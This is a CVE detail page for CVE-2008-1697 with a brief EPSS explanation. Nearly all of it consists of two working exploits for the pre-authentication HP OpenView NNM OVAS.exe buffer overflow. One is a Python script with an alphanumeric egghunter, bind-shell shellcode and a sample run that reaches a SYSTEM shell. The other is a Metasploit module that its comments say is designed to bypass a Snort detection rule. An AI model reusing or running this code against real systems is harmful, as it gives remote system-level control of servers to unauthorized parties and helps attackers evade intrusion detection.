CVE-2008-1697 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/python ################################################################################ # HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow # Tested on Windows 2003 Server SP1. # Coded by Mati Aharoni # muts..at..offensive-security.com # http://www.offensive-security.com/0day/hp-nnm-ov.py.txt # [shameless plug] # This vulnerability was found, analysed and exploited # as part of a training module in "BackTrack to the Max". # http://www.offensive-security.com/ilt.php # [/shameless plug] ################################################################################# # bt 0day# python hp-nnm-ov.py # [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day) # [*] http://www.offensive-security.com # [*] Sending evil HTTP request to NNMz, ph33r # [*] Egghunter working ... # [*] Check payload results - may take up to a minute. # bt 0day# nc -v 192.168.1.111 4444 # (muts) [192.168.1.111] 4444 (krb524) open # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # # C:\>whoami # whoami # nt authority\system # # C:\> # ################################################################################ # Insane, "We own all those registers, but how the heck do we get EIP" method. ################################################################################ # crash = "T"*1300 # ################################################################################# # Funky, "Lets make the stack happy and pray for EIP" overwrite method. ################################################################################# # Case 1 - Stack not happy: # crash = "T"*989 # # Case 2 - Stack happy, we own EIP - blessed by the angels above: # 0x44442638 - Happy NNM address # crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510" # 12 bytes of nasty strict alphanum shellcode possibility @EBP # ################################################################################ # Unknown "wtf, these bytes are expanding" SEH method: ################################################################################ # 0x6d356c6e - POP POP RET somewhere in NNM # crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510" # ################################################################################ # Final exploit crash SEH method: ################################################################################ # crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510" # ################################################################################ import socket import os import sys print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)" print "[*] http://www.offensive-security.com" # Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r # One egg to rule them all. egghunter=( "%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J" "MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5" "21*-q!au-q!au-oGSePAA%JMNU%521*-D" "A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1" "z1E-oRHEPAA%JMNU%521*-3s1--331--^" "TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA" "A%JMNU%521*-R222-1111-nZJ2PAA%JMN" "U%521*-1-wD-1-wD-8$GwP") alignstack="\x90"*34+"\x83\xc4\x03" # win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com # Spawned shell dies quickly as a result of a parent thread killing it. # Best shellcodes are of the "instant" type, such as adduser, etc. bindshell=("T00WT00W" + alignstack + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" "\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" "\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" "\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" "\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" "\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" "\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" "\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" "\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" "\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" "\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" "\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" "\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" "\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" "\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a") # 0x6d356c6e pop pot ret somehwere in NNM 7.5.1 evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510" buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n" buffer+="Content-Type: application/x-www-form-urlencoded\r\n" buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n" buffer+="Content-Length: 1048580\r\n\r\n" buffer+= bindshell print "[*] Sending evil HTTP request to NNMz, ph33r" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("192.168.1.111", 7510)) expl.send(buffer) expl.close() print "[*] Egghunter working ..." print "[*] Check payload results - may take up to a minute." # milw0rm.com [2008-04-02]

## # $Id: hp_nnm_ovas.rb 10660 2010-10-12 18:39:21Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # This should bypass the following snort rule referenced from web-misc.rules (10/17/2008) # alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;) # Newer versions of this rule might find this but we've taken steps to atleast bypass this rule ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier. Specifically this vulnerability is caused by a failure to properly handle user supplied input within the HTTP request including headers and the actual URL GET request. Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode which was alphanumeric encoded by muts in the original exploit. If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably some timeout handling code that causes this. }, 'Author' => [ 'bannedit', # muts wrote the original exploit and did most of the initial work # credit where credit is due. =) 'muts' ], 'Version' => '$Revision: 10660 $', 'References' => [ [ 'CVE', '2008-1697' ], [ 'OSVDB', '43992' ], [ 'BID', '28569' ], ], 'DefaultOptions' => { 'WfsDelay' => 45, 'EXITFUNC' => 'thread', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x0a\x0d\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Privileged' => true, 'Targets' => [ # need more but this will likely cover most cases [ 'Automatic Targeting', { 'auto' => true } ], [ 'Windows 2003/zip.dll OpenView 7.53', { 'Ret' => 0x6d633757 # pop pop ret } ], [ 'Windows 2000/jvm.dll OpenView NNM 7.51', { 'Ret' => 0x6d356c6e # pop pop ret } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 02 2008')) register_options( [ Opt::RPORT(7510), OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ]) ], self.class) end def exploit targ = target if (target['auto']) print_status("Detecting the remote version...") resp = send_request_raw({'uri' => '/topology/home'}, 5) if resp.nil? print_status("No response to request") return Exploit::CheckCode::Safe end case resp.body when /NNM Release B.07.53/ targ = targets[1] when /NNM Release B.07.51/ targ = targets[2] else raise RuntimeError, "Unable to determine a target automatically..." # if snmp is running you could set the target based on community strings end end print_status("Using target: #{targ.name}") exploit_target(targ) end def exploit_target(targ) # we have to use an egghunter in this case because of the restrictions # on the characters we can use. # we are using skape's egghunter alpha numeric encoded by muts egghunter = '%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J'+ 'MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5'+ '21*-q!au-q!au-oGSePAA%JMNU%521*-D'+ 'A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1'+ 'z1E-oRHEPAA%JMNU%521*-3s1--331--^'+ 'TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA'+ 'A%JMNU%521*-R222-1111-nZJ2PAA%JMN'+ 'U%521*-1-wD-1-wD-8$GwP' print_status("Constructing the malformed http request") buf = "http://" buf << "\xeb" * 1101 # this gets mangled in such a way we can use less input buf << "\x41" * 4 # sometimes less really is more buf << "\x77\x21" # \xeb is restricted so we use a conditional jump which is always taken buf << [targ.ret].pack('V') buf << "G" * 32 buf << egghunter buf << "\x41" * 100 buf << ":#{datastore['RPORT']}" # T00W is the egg payload_buf = "T00WT00W" + make_nops(34) + "\x83\xc4\x03" + payload.encoded begin connect resp = send_request_raw({ 'uri' => buf + "/topology/home", 'version' => '1.1', 'method' => 'GET', 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded', 'User-Agent' => datastore['UserAgent'], }, 'data' => payload_buf }) rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR # do nothing let the exploit live this catches the # connection reset by peer error which is expected end if not resp.nil? raise RuntimeError, "The server responded, that wasn't supposed to happen!" end print_status("Malformed http request sent.") print_status("Now we wait for the egg hunter to work it's magic. thx skape!") handler disconnect end def check resp = send_request_raw({'uri' => '/topology/home'}, 5) if resp.nil? print_status("No response to request") return Exploit::CheckCode::Safe end if (resp.body =~ /NNM Release B.07.53/ || resp.body =~ /NNM Release B.07.52/ || resp.body =~ /NNM Release B.07.51/) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end end